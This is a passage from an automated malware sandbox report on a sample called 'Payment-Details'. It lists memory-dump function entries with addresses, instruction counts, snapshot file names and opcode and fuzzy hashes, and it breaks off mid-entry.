                                        • Instruction Fuzzy Hash: DCD0A7317582209FD304DBACE454ED83BF5DF49720F1541AAE608CB332C997CC428781
                                        Function 07259238 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a7b67a0643b82474763cc326f496f367e38d352c36a2861de4f55f98edb5b6f9
                                        • Instruction ID: 614e9eea8f2e2749725951abf9ee5116b5d4aee8f3b8fe3874abf966d5cd870b
                                        • Opcode Fuzzy Hash: a7b67a0643b82474763cc326f496f367e38d352c36a2861de4f55f98edb5b6f9
                                        • Instruction Fuzzy Hash: 95E01270A01309EFCB40DFA5E90469DB7FDEB85200F108599D80CD3344EA356F049BA2
                                        Function 066F4438 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 729c7d20d9678927fbea23d732468ab670b08e8128db38277ed4025a18fa28e5
                                        • Instruction ID: be18c62d01d8a00202851230476407274cdb1afd9bdf60aff555649a7cb59bb8
                                        • Opcode Fuzzy Hash: 729c7d20d9678927fbea23d732468ab670b08e8128db38277ed4025a18fa28e5
                                        • Instruction Fuzzy Hash: 58D0A774908208EFCB84CF98E851B6AB3FCEB46218F10809CDD1C63762CE329D42C791
                                        Function 0723A848 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 97f42dc960f442d8a29cff1f95b43ac13452ef0968a9efc052df69581d47989c
                                        • Instruction ID: c4832e7db6a9f7dbb93d2965c50ce9e37caf3f32e5587aa15de28926c408a796
                                        • Opcode Fuzzy Hash: 97f42dc960f442d8a29cff1f95b43ac13452ef0968a9efc052df69581d47989c
                                        • Instruction Fuzzy Hash: 41D0A7F0918208EBCB44CB99D840B69B3BDDB47214F10C1ACEC0953361CB729D43D780
                                        Function 07239CB8 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 97f42dc960f442d8a29cff1f95b43ac13452ef0968a9efc052df69581d47989c
                                        • Instruction ID: 5cb48420a83e61e230b9e81a941ab12636e019a25fb6dd85d171ed6be5debc09
                                        • Opcode Fuzzy Hash: 97f42dc960f442d8a29cff1f95b43ac13452ef0968a9efc052df69581d47989c
                                        • Instruction Fuzzy Hash: 6ED0A7F0518208EBC744DB98D850B69B7FCDB4B218F10849DD80C53361DAB2AD82CF80
                                        Function 07256D41 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cfe8c13df042d568bcc770aaedfd53c0a75f19cb7d631df8a131268fe023e9dc
                                        • Instruction ID: f4babdc9edda966b8c8319ee199d9bc7fc6e6095405429c85ea2f8cf61262b32
                                        • Opcode Fuzzy Hash: cfe8c13df042d568bcc770aaedfd53c0a75f19cb7d631df8a131268fe023e9dc
                                        • Instruction Fuzzy Hash: 8AE0E5B0A00219CBEB549B64EC59BA9BA72FB4A300F104299D91EB3384CB702DC4CF61
                                        Function 07257454 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c03a98b89422bf430ad6d01c6a82d786e7c42acf29e47165149a120a7c823b73
                                        • Instruction ID: 04c4482d526852b7391bd9ce3c7408d96a21f0d08aa108b72650bc6518fc0e4e
                                        • Opcode Fuzzy Hash: c03a98b89422bf430ad6d01c6a82d786e7c42acf29e47165149a120a7c823b73
                                        • Instruction Fuzzy Hash: 9DE01AB09002148BD790DF60D859BADB772EB4A300F408099DA0E73394CB306DC1CF55
                                        Function 072574AA Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4a7a1cffbb7bcda0204b2dc8a126e130d199ca7edac504cae1f2d2ce5a520b0c
                                        • Instruction ID: 1ec0eb3a445bcb6389f9f091638181f06a21c7a7879729573f68f3de594fac29
                                        • Opcode Fuzzy Hash: 4a7a1cffbb7bcda0204b2dc8a126e130d199ca7edac504cae1f2d2ce5a520b0c
                                        • Instruction Fuzzy Hash: B9E0E570910218CBD750DBA0E858B9DBB72FB89341F104099D90EA7389CB302D84CF64
                                        Function 07256C95 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd4630785ff321644c1369bd612c4051e11470b479cbb92ea6bbd17407e39d64
                                        • Instruction ID: 039885b8c80c6698b148f57c58fb4caa36a04f774319a056a3a966efa16a9c1b
                                        • Opcode Fuzzy Hash: dd4630785ff321644c1369bd612c4051e11470b479cbb92ea6bbd17407e39d64
                                        • Instruction Fuzzy Hash: B8E01A74A043199FCB94DF54D8483ADB776EB8A310F108099898E73384CE706DC8CF26
                                        Function 07256CEB Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af152bb9a653dcb97c469befdda30f6370cc262085503b9c56aca995b3408f70
                                        • Instruction ID: b891f635a25a1da113c9eb8accec7c627ac848cff91ebdef257c072174c5db25
                                        • Opcode Fuzzy Hash: af152bb9a653dcb97c469befdda30f6370cc262085503b9c56aca995b3408f70
                                        • Instruction Fuzzy Hash: C8E01A749002188FD790DF54DC587ADB7B6EB49300F009299C90E73384CA706DC8CF69
                                        Function 072573A8 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2aba9292da0aa310a405d6e1021f5a1b8bcb6050cea546eaaa25c7d55e4ef47
                                        • Instruction ID: b3576809148b97cc663a3b6c6dd6a548f5a6dac6a5ff0535dd8fea7e6ea328e6
                                        • Opcode Fuzzy Hash: b2aba9292da0aa310a405d6e1021f5a1b8bcb6050cea546eaaa25c7d55e4ef47
                                        • Instruction Fuzzy Hash: ACE01A74A102188BC754DF50D95879DBBB2FB8A340F008199D90FB3394CB705D80CF65
                                        Function 072573FE Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c253d2f7b0776c6c13565cb8f6c4a20129435e3dc69eafce9f03cdf63d8eb6b7
                                        • Instruction ID: 466e843704959424e2be1d84c141a7bdc13f813d21b2b1cc4c03998ec952f508
                                        • Opcode Fuzzy Hash: c253d2f7b0776c6c13565cb8f6c4a20129435e3dc69eafce9f03cdf63d8eb6b7
                                        • Instruction Fuzzy Hash: 37E0E574A013188BD7509B64DCA9B9DB772FB85311F0001999A0EA3394CA302DC08F25
                                        Function 07257113 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43c5d9bd32e1bb83d4c637515113be121d0623d5b554dff2e2a475a04003cc6b
                                        • Instruction ID: 80ae370812c2eaf266f87b5fac0b4f0fa38e01a3c202b38116125d4b16d803a4
                                        • Opcode Fuzzy Hash: 43c5d9bd32e1bb83d4c637515113be121d0623d5b554dff2e2a475a04003cc6b
                                        • Instruction Fuzzy Hash: BFE0E570920254CBCB50EB54D8687AABAB2FB49300F0000A9990A63284CB342D80CF11
                                        Function 07257192 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9e1056346a86c71b9a06b0ce1e824006f98d023d5009bb84ee03ac3ee4c47bfa
                                        • Instruction ID: 4431f6bfe74af803cb2490e698b0d3e3c33d392d1c0883280c00fadbd6c0da51
                                        • Opcode Fuzzy Hash: 9e1056346a86c71b9a06b0ce1e824006f98d023d5009bb84ee03ac3ee4c47bfa
                                        • Instruction Fuzzy Hash: 79E0E5B4A01214CFD750DB54E858BA9B7B6EB8A300F119098C90AA3284CA302D84CF25
                                        Function 072570BD Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0dbae9b5485762730a8aa3edf8dbb2dfdb4d9d9ea9f6a38c2e6e72536259655c
                                        • Instruction ID: 51ba808729ddf4bdaa53a17c46fe2247b765c5661f2aa3149ec00649f6410fd5
                                        • Opcode Fuzzy Hash: 0dbae9b5485762730a8aa3edf8dbb2dfdb4d9d9ea9f6a38c2e6e72536259655c
                                        • Instruction Fuzzy Hash: 86E01AB4A102188BC750EFA1D8587ADB772FB8A301F00419AD90E73384CB301D80CF65
                                        Function 070EEC80 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c6f056824b45df08b20d7b8ca15e41513dffce4a2caa6f4e5216d34c59af03c6
                                        • Instruction ID: 759b3483470f8c4090f7a4cd3ee9db05eb7d5a7020e1136d3c249dc921cd0dc2
                                        • Opcode Fuzzy Hash: c6f056824b45df08b20d7b8ca15e41513dffce4a2caa6f4e5216d34c59af03c6
                                        • Instruction Fuzzy Hash: 8FD0A93000AAC5CFC70283688C628D4BF78DD0322036940CAE88887143E322682ED761
                                        Function 070E28DD Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e304c4ac49000bc22bd53516449b0ff84b415dcbea5c396ca6fd5b07a68cd2e0
                                        • Instruction ID: 486d1f565674f24ff4db231aacc36fa45c6df4efce76c5019e0f8a25043ad10b
                                        • Opcode Fuzzy Hash: e304c4ac49000bc22bd53516449b0ff84b415dcbea5c396ca6fd5b07a68cd2e0
                                        • Instruction Fuzzy Hash: 0CE0EDB4D0011A8FCB60CF58D884BADBBB5FB48300F0041AAD959A3740E7345D80DF40
                                        Function 066F47C0 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d989f8d5c78d944dc37fa6d8d76466ebc68fdac19ec6a27fb4c531ddd53cc118
                                        • Instruction ID: 0646f2255e97f42750bca46fd7f0aa4b46bf094ea57e5c5fc5ffce1fb9067be2
                                        • Opcode Fuzzy Hash: d989f8d5c78d944dc37fa6d8d76466ebc68fdac19ec6a27fb4c531ddd53cc118
                                        • Instruction Fuzzy Hash: BBD0A770815308EBD794DB65C90077EB3BEDB03110F50009CD61422B11DF715960C780
                                        Function 072356F1 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9b619c5bda39221a95a7125920864eb901df20c45ae4af78405a496a2cbce703
                                        • Instruction ID: 0b799fe734f388e79ab98800fe9007602e8e9a69e85d5515edd712534deae946
                                        • Opcode Fuzzy Hash: 9b619c5bda39221a95a7125920864eb901df20c45ae4af78405a496a2cbce703
                                        • Instruction Fuzzy Hash: FED01232058354EFC3038F90F8948E97FB5AF0A62075881A3F60C8A053E736A965DF99
                                        Function 0725D5F0 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fcd01a76ab5f3c6a4eba90c4027b4378533bb145deb6589834e7250b7da4f6e7
                                        • Instruction ID: 24a7d28b33c8d13ecb66c33b0c749e5eb084fbfc26131ec45cb71d57a9285bfa
                                        • Opcode Fuzzy Hash: fcd01a76ab5f3c6a4eba90c4027b4378533bb145deb6589834e7250b7da4f6e7
                                        • Instruction Fuzzy Hash: 72D0123640D3E00EDB03937555150D97F70DD6325131940D7D2C5CA457C2240825E3E1
                                        Function 07233518 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1f5d82cd05f451d2c48ecc76891c2d1205af413a435725fd4ee020893f77ce5d
                                        • Instruction ID: 89fdbeb7b3191620cfb9a45ab924b1ae5f8eb8f70c6ed87b079e0dbb16fb493e
                                        • Opcode Fuzzy Hash: 1f5d82cd05f451d2c48ecc76891c2d1205af413a435725fd4ee020893f77ce5d
                                        • Instruction Fuzzy Hash: 5BD052321083C49FC3039B24E450885BFB0AE0B22031940C2E9888F223C22299A6DB82
                                        Function 07236410 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 47d6914aca4d9f6f8c80d1001619615afcb100f7bf5e128754bf0ffdbe0c39bc
                                        • Instruction ID: f3c5afcac086e3b81c3edd0943bc03b472a0387696bec12690845da2832792b2
                                        • Opcode Fuzzy Hash: 47d6914aca4d9f6f8c80d1001619615afcb100f7bf5e128754bf0ffdbe0c39bc
                                        • Instruction Fuzzy Hash: E5D05E350091815FC302C750C4A0495FF359F47224718C4CAD9948B253C7269813DB01
                                        Function 0725AAF1 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61cde7e9b4f341886d23678e569db92b54202b79193b4664732ec5e04c76b10a
                                        • Instruction ID: d17f3d7e0804d6b8b813bfbfbeecd9ca0c2c62c9eaff2a808817781ffb30bf91
                                        • Opcode Fuzzy Hash: 61cde7e9b4f341886d23678e569db92b54202b79193b4664732ec5e04c76b10a
                                        • Instruction Fuzzy Hash: 63D0CA292082C49FDB131A302862BE63FA40B0B210F0902C2E0C08A8D3C64805C083B2
                                        Function 019F6B08 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 83024f5e7df52b34bfe97291daff3407d8ad5cdb428b7c012b116ab263b0a463
                                        • Instruction ID: 768e1293452395c27b28ce4b78fa6a1c80a11cc7f921b91c3db3f2b5b24aed2c
                                        • Opcode Fuzzy Hash: 83024f5e7df52b34bfe97291daff3407d8ad5cdb428b7c012b116ab263b0a463
                                        • Instruction Fuzzy Hash: F9C012323101258BC704AB6CE414D9977ED9B89B24B1581AAEA09CB362CAA3EC0047C8
                                        Function 066F0B06 Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5b810fd98ce5104b8b4e2c7f4ca19d72910da515aab492dbb70e7cf782b2435a
                                        • Instruction ID: b8c42a8c8a319b7de9a0709a87b217473910a0c4fd67b07abbad5ca1bfbdec09
                                        • Opcode Fuzzy Hash: 5b810fd98ce5104b8b4e2c7f4ca19d72910da515aab492dbb70e7cf782b2435a
                                        • Instruction Fuzzy Hash: BFE0BD38805228CFDB609F11DC48BE8BBB9BB48301F5080E5C409A3251C7355B89DF80
                                        Function 07253545 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 200007d5738f2816bd9aecf41144aa843371005adab2a42251cc10560b5f8c06
                                        • Instruction ID: b448dbc102e50d79a9ca0301a336e0d06646437b82b690ba078f32f1eab5207d
                                        • Opcode Fuzzy Hash: 200007d5738f2816bd9aecf41144aa843371005adab2a42251cc10560b5f8c06
                                        • Instruction Fuzzy Hash: 77D05EB0614329CFCB25CB34D84479A77BAFB89300F0096A5940963248DB740E428F82
                                        Function 070EAF92 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1fa4fca89375c4e3876baf517a4812c287ed60d9a3688372d9e92524d48cb17c
                                        • Instruction ID: 6651aeb783d9b555b034edea446a262df6bb9b0a9f6788e181442a702cde5425
                                        • Opcode Fuzzy Hash: 1fa4fca89375c4e3876baf517a4812c287ed60d9a3688372d9e92524d48cb17c
                                        • Instruction Fuzzy Hash: E0E017F4E10218CFEB14CF64E840B9CBBB1EF0A300F0081D6E409A3310CB344A808F11
                                        Function 0752CB60 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82c068834acbeb315931a4112f08f84ce938fb5ceb13f428dfdc828cae53a3cb
                                        • Instruction ID: f84f9c6698da959932dda815b337b654544a4acc441eb053b36816019fbd9315
                                        • Opcode Fuzzy Hash: 82c068834acbeb315931a4112f08f84ce938fb5ceb13f428dfdc828cae53a3cb
                                        • Instruction Fuzzy Hash: 5CC02BF208D30483D31013446D0C3B973DCE707206FC01A009A0D104B38A6018C5D9B4
                                        Function 07234FC2 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e80f9a9cb2c48ad0a6b970d8fbdf57c9835f01045b21ce56bbca2da8e4486d38
                                        • Instruction ID: 4d8f13da6d8a340e230399bed7daf760fda2014d50d495bfcd21f5baa6af4738
                                        • Opcode Fuzzy Hash: e80f9a9cb2c48ad0a6b970d8fbdf57c9835f01045b21ce56bbca2da8e4486d38
                                        • Instruction Fuzzy Hash: E9D0127150D3C19FC7074720D4154A97FB2DFD230572685EAD08086262C63D9C22DF61
                                        Function 07254923 Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c2e84e58220e5e2e7922cbd5036863a6f3144ff7137d4540085b3243d30385c
                                        • Instruction ID: 3ff3d1f38ac9e9e79ccdbebd4316cdb44aa5e9c474a954080c6fbe8f3e486a1b
                                        • Opcode Fuzzy Hash: 9c2e84e58220e5e2e7922cbd5036863a6f3144ff7137d4540085b3243d30385c
                                        • Instruction Fuzzy Hash: 80D0A770809366CBC711CB24ED147857768FB41310F0497DE541873151D7F11E808F02
                                        Function 070E5FB6 Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3cb925b90dd166de447113280eed96f8de2b46b67c9c26067cdf36376d8dd5c0
                                        • Instruction ID: ab43d8abf1daaf9fa63c0a54469de9fd0b919f4cee231550705965e358f53138
                                        • Opcode Fuzzy Hash: 3cb925b90dd166de447113280eed96f8de2b46b67c9c26067cdf36376d8dd5c0
                                        • Instruction Fuzzy Hash: D2D048B8A052298FCB24DF20D988A9EBBB5FB19301F0091D5D91AA3341C7705E818E54
                                        Function 019FF4D0 Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c728ca4cfcb19d180836eb84d594788a4d70312e359c5c606191ea6aba104bb4
                                        • Instruction ID: 2593a8587267b30f37ca15b2a7b0b5f83575504867fc6b688f20d988b5cd35a1
                                        • Opcode Fuzzy Hash: c728ca4cfcb19d180836eb84d594788a4d70312e359c5c606191ea6aba104bb4
                                        • Instruction Fuzzy Hash: A0C08C71440304CBE721B7F9AC0C32876AAEB05A02FC00114E30C504328A740080CE76
                                        Function 0723EBBB Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 22763bbda97095f1ed5e24019d9bd8e470968a5b9e67b798f2d9bfc3adc2e229
                                        • Instruction ID: bb802cdc77149eed202c8136c301e3f25d4605178e27c699ee81b68061b8ce1a
                                        • Opcode Fuzzy Hash: 22763bbda97095f1ed5e24019d9bd8e470968a5b9e67b798f2d9bfc3adc2e229
                                        • Instruction Fuzzy Hash: 46D05EB8D11004CBEB00DF61DC04B58B7B5FB45300F00419AD509A3294C7301D80CF11
                                        Function 070EBBBF Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 383c60b28a3f04578474a255524f6ba530e5191975d32611fcdc49e466d0c9d1
                                        • Instruction ID: 910e5bb9c1d2dee587564cbde194a83754f66138d737fdf39bfd9e0632ec51db
                                        • Opcode Fuzzy Hash: 383c60b28a3f04578474a255524f6ba530e5191975d32611fcdc49e466d0c9d1
                                        • Instruction Fuzzy Hash: 02C04C76E1012E9BCF00DBD9F9508DCFB74EF94321F404036D214A7104D6301526CF58
                                        Function 07257169 Relevance: .0, Instructions: 8COMMON
                                        Download Yara Rule
                                        Memory Dump Source
